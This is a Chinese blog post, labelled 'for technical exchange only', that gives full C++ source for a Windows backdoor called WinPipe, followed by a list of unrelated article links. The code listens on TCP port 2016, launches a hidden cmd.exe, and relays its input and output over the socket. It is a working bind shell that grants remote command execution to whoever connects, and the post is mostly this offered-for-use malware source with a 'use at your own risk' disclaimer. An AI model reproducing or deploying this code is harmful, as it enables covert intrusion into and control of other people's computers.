具体怎么编译,生成执行程序,不懂得先学习C++程序代码编译和集成开发环境。

多的不说了,只有两个代码文件,一个头文件,一个源文件。不多说了,直接上干货。

(恶意使用,或者商用,后果自负,与本人无关。)

head.h

#pragma once

#ifndef WINVER                          // Specifies that the minimum required platform is Windows Vista.

#define WINVER 0x0600           // Change this to the appropriate value to target other versions of Windows.

#endif

#ifndef _WIN32_WINNT            // Specifies that the minimum required platform is Windows Vista.

#define _WIN32_WINNT 0x0600     // Change this to the appropriate value to target other versions of Windows.

#endif

#ifndef _WIN32_WINDOWS          // Specifies that the minimum required platform is Windows 98.

#define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later.

#endif

#ifndef _WIN32_IE                       // Specifies that the minimum required platform is Internet Explorer 7.0.

#define _WIN32_IE 0x0700        // Change this to the appropriate value to target other versions of IE.

#endif

#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers

// Windows Header Files:

#include <windows.h>

// Windows Socket Files:

#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

// C RunTime Header Files

#include <stdlib.h>

#include <malloc.h>

#include <memory.h>

#include <tchar.h>

class CThreadNode

{

public:

	SOCKET m_Sock;

	HANDLE hPipe;

	CThreadNode()

	{

		m_Sock = INVALID_SOCKET;

		hPipe = NULL;

	}

};

main.cpp

#include "Head.h"

bool SocketInit()

{

	WSADATA wsaData={0};

	if ( WSAStartup(MAKEWORD(2, 2), &wsaData) == NO_ERROR )

	{

		return TRUE;

	}

	else

	{

		return FALSE;

	}

}

int SendData(SOCKET m_Sock, void *pBuf, DWORD dwBufLen)

{

	if ( m_Sock == INVALID_SOCKET || !pBuf || dwBufLen <= 0 )

	{

		return -1;

	}

	int iCurrSend = 0, offset = 0;

	do {

		iCurrSend = send(m_Sock, (char *)pBuf+offset, dwBufLen, 0);

		if ( iCurrSend <= 0 )

		{

			break;

		}

		dwBufLen -= iCurrSend;

		offset += iCurrSend;

	}

	while ( dwBufLen > 0 );

	return offset;

}

BOOL bExit = FALSE;

#define RECV_BUF_LEN 1024*10

char szCmdBuf[MAX_PATH] = {0};

DWORD WINAPI ThreadInputProcess(LPVOID lpParam)

{

	CThreadNode tNode = *(CThreadNode *)lpParam;

	DWORD dwWrited = 0, dwRecvd = 0;

	char szBuf[MAX_PATH] = {0};

	BOOL bRet = FALSE;

	while ( TRUE )

	{

		dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);

		if ( dwRecvd > 0 && dwRecvd != SOCKET_ERROR )

		{

			WriteFile(tNode.hPipe, szBuf, dwRecvd, &dwWrited, NULL);

		}

		else{

			closesocket(tNode.m_Sock);

			WriteFile(tNode.hPipe, "exit\r\n", sizeof("exit\r\n"), &dwWrited, NULL);

			CloseHandle(tNode.hPipe);

			bExit = TRUE;

			break;

		}

		Sleep(50);

	}

	return TRUE;

}

DWORD WINAPI ThreadOutputProcess(LPVOID lpParam)

{

	CThreadNode tNode = *(CThreadNode *)lpParam;

	char szBuf[RECV_BUF_LEN] = {0};

	DWORD dwReadLen = 0, dwTotalAvail = 0;

	BOOL bRet = FALSE;

	while ( !bExit ) {

		dwTotalAvail = 0;

		bRet = PeekNamedPipe(tNode.hPipe, NULL, 0, NULL, &dwTotalAvail, NULL);

		if ( bRet && dwTotalAvail > 0 ) {

			bRet = ReadFile(tNode.hPipe, szBuf, RECV_BUF_LEN, &dwReadLen, NULL);

			if ( bRet && dwReadLen > 0 ) {

				SendData(tNode.m_Sock, szBuf, dwReadLen);

			}

			Sleep(50);

		}

	}

	CloseHandle(tNode.hPipe);

	return TRUE;

}

BOOL StartBackdoorShell(UINT uPort)

{

	if ( !SocketInit() ) {

		return FALSE;

	}

	SOCKET m_ListenSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if ( m_ListenSock == INVALID_SOCKET ) {

		return FALSE;

	}

	sockaddr_in sServer = {0};

	sServer.sin_family = AF_INET;

	sServer.sin_addr.s_addr = htonl(INADDR_ANY);

	sServer.sin_port = htons(uPort);

	if ( bind(m_ListenSock, (sockaddr *)&sServer, sizeof(sServer)) == SOCKET_ERROR ) {

		return FALSE;

	}

	if ( listen(m_ListenSock, 5) == SOCKET_ERROR ) {

		return FALSE;

	}

	SOCKET m_AcceptSock = accept(m_ListenSock, NULL, NULL);

	// Create Pipe;

	CThreadNode m_ReadNode, m_WriteNode;

	STARTUPINFO si = {0};

	si.cb = sizeof(STARTUPINFO);

	PROCESS_INFORMATION pi = {0};

	DWORD dwThreadRead = 0, dwThreadWrite = 0;

	HANDLE hReadPipe1 = NULL, hWritePipe1 = NULL; // Input the command;

	HANDLE hReadPipe2 = NULL, hWritePipe2 = NULL; // Get the command results;

	HANDLE hThreadOutput = NULL, hThreadInput = NULL;

	SECURITY_ATTRIBUTES sa = {0};

	sa.nLength = sizeof(SECURITY_ATTRIBUTES);

	sa.lpSecurityDescriptor = NULL;

	sa.bInheritHandle = TRUE;

	if ( !CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0) || !CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0) ) {

		return FALSE;

	}

	m_ReadNode.m_Sock = m_WriteNode.m_Sock = m_AcceptSock;

	GetStartupInfo(&si);

	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

	si.hStdInput = hReadPipe1;

	si.hStdOutput = si.hStdError = hWritePipe2;

	si.wShowWindow = SW_HIDE;

	TCHAR szCmdLine[MAX_PATH] = {0};

	GetSystemDirectory(szCmdLine, MAX_PATH);

	_tcscat_s(szCmdLine, MAX_PATH, _T("\\cmd.exe"));

	if ( !CreateProcess(szCmdLine, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi) )

	{

		return FALSE;

	}

	m_ReadNode.hPipe = hReadPipe2;

	hThreadOutput = CreateThread(NULL, 0, ThreadOutputProcess, &m_ReadNode, 0, &dwThreadWrite);

	m_WriteNode.hPipe = hWritePipe1;

	hThreadInput = CreateThread(NULL, 0, ThreadInputProcess, &m_WriteNode, 0, &dwThreadRead);

	HANDLE szHandles[] = { hThreadOutput, hThreadInput };

	WaitForMultipleObjects(2, szHandles, TRUE, INFINITE);

	return TRUE;

}

int APIENTRY _tWinMain(HINSTANCE hInstance,

	HINSTANCE hPrevInstance,

	LPTSTR    lpCmdLine,

	int       nCmdShow)

{

	StartBackdoorShell(2016);

	ExitProcess(0);

	return 0;

}

WinPipe后门程序代码示例(仅限技术交流)的更多相关文章

  1. 最小化JIT示例(仅限Intel x86+Windows)

    #include <Windows.h> #include <cstdint> #include <cstring> #define BACK_FILL (0) i ...

  2. 编译.net .net Core程序 代码,仅做备份

    //创建一个ProcessStartInfo对象 使用系统shell 指定命令和参数 设置标准输出 //编译.net core项目 var psi = new ProcessStartInfo(&qu ...

  3. 微软代码示例:ASP.NET 2.0 三层架构应用程序教程系列

    本文转自:http://www.codeusing.com/hi/uephee.wen/resource/view/170.aspx 资源分类:微软代码示例               更新日期:20 ...

  4. C#/WPF/WinForm/.NET程序代码实现软件程序开机自动启动的两种常用方法的示例与源码下载带详细注释-源码代码-注册表方式-启动目录快捷方式

    C#/WPF/WinForm/.NET程序代码实现软件程序开机自动启动的两种常用方法的示例与源码下载带详细注释-源码代码-注册表方式-启动目录快捷方式 C#实现自动启动的方法-两种方法 源码下载地址: ...

  5. 转:HIBERNATE一些_方法_@注解_代码示例---写的非常好

    HIBERNATE一些_方法_@注解_代码示例操作数据库7步骤 : 1 创建一个SessionFactory对象 2 创建Session对象 3 开启事务Transaction : hibernate ...

  6. My.Ioc 代码示例——利用 ObjectBuilderRequested 事件实现延迟注册

    在使用 Ioc 框架时,一般我们建议集中在一个称为 Composition Root(其含义请参见下面的小注)的位置来注册 (Register) 和解析 (Resolve) 服务.这种做法的目的在于限 ...

  7. JAVA NIO工作原理及代码示例

    简介:本文主要介绍了JAVA NIO中的Buffer, Channel, Selector的工作原理以及使用它们的若干注意事项,最后是利用它们实现服务器和客户端通信的代码实例. 欢迎探讨,如有错误敬请 ...

  8. 2018-11-16 中文代码示例之Programming in Scala笔记第四五六章

    续前文: 中文代码示例之Programming in Scala学习笔记第二三章. 同样仅节选有意思的例程部分作演示之用. 源文档仍在: program-in-chinese/Programming_ ...

  9. 中文代码示例之NW.js桌面应用开发初体验

    先看到了NW.js(应该是前身node-webkit的缩写? 觉得该起个更讲究的名字, 如果是NorthWest之意的话, logo(见下)里的指南针好像也没指着西北啊)和Electron的比较文章: ...

随机推荐

  1. ubuntu安装

    今天在win10下安装Ubuntu,结果没经验导致win10找不回来了,我再好好整理些思路 安装前要做一个ghost,万一出现问题可以用来恢复系统! 1,我使用USB Installer 在http: ...

  2. JavaScript学习笔记(一):介绍JavaScript的一些简单知识

    JavaScript是世界上最流行的编程语言.这门语言可用于HTML和web,更可广泛用于服务器.PC.笔记本电脑和智能手机等设备.---------------------------------- ...

  3. [POJ2069]Super Star(模拟退火)

    题目链接:http://poj.org/problem?id=2069 题意:求一个半径最小的球,使得它可以包围住所有点. 模拟退火,圆心每次都去找最远那个点,这样两点之间的距离就是半径,那么接下来移 ...

  4. sublimetext3备份

    http://files.cnblogs.com/files/hwd13/Data.zip http://files.cnblogs.com/files/hwd13/sublime3.zip

  5. hdu 4920 Matrix multiplication bitset优化常数

    Matrix multiplication Time Limit: 4000/2000 MS (Java/Others)    Memory Limit: 131072/131072 K (Java/ ...

  6. 在ionic/cordova中使用百度地图插件

    在ionic项目中,如果想实现定位功能,可以使用ng-cordova提供的cordova-plugin-geolocation. 但由于高墙的缘故,国内andorid环境下,此插件不起作用(ios环境 ...

  7. red hat安装mysql二进制包

    数据包命名格式解释 mysql-5.7.15-linux-glibc2.5-x86_64.tar.gz 黑色粗体表示为包名称 蓝色表示linux系统二进制包 红色表示构架     1.上传mysql- ...

  8. EasyUI的combobox控件使用onchange 问题

    在项目中几次都遇到了同样的问题,现在都不知道怎样解决了! 路过的朋友们帮我看看嘛!谢谢了! 最后我想要实现的效果是这样的.   在下拉列表中不存在值.(这里的是下拉列表中存在值的!)  但是在我输入值 ...

  9. 28. Implement strStr()

    Implement strStr(). Returns the index of the first occurrence of needle in haystack, or -1 if needle ...

  10. 一个servlet处理多个功能

    servlet中: String servletPath = request.getServletPath(); String methodName = servletPath.substring(1 ...